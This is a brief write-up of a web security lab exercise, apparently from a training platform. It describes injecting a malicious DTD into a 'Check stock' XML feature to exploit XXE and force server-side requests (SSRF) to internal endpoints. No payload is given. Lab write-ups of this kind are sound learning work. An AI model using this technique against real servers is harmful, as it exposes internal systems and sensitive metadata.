This lab focused on using XXE to perform an SSRF attack. The application had a 'Check stock' feature that accepted and processed XML input. By injecting a malicious DTD, I was able to define an external entity referencing an internal endpoint.
Exploiting this XXE vulnerability allowed me to direct the server to make internal requests on my behalf. Through SSRF, sensitive metadata could be accessed.
Dendrite
コメント